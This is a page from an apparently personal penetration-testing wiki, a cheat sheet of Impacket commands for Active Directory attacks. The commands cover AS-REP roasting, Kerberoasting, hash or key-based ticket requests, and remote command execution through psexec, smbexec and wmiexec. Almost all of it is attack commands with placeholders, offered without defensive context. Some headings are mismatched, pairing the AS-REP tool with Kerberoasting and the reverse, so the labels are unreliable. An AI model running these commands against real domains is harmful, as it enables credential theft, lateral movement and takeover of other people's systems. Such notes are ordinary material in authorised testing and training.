Skip to content

Impacket Kerberoasting

Jump to bottom
TheGetch edited this page Jan 5, 2021 · 1 revision

Impacket Kerberoasting

Check for Kerberoasting:

  • GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john

GetUserSPNs

ASREPRoast:

  • impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
  • impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting:

  • impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

Overpass The Hash/Pass The Key (PTK):

  • python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
  • python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
  • python3 getTGT.py <domain_name>/<user_name>:[password]

Using TGT key to excute remote commands from the following impacket scripts:

  • python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  • python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  • python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally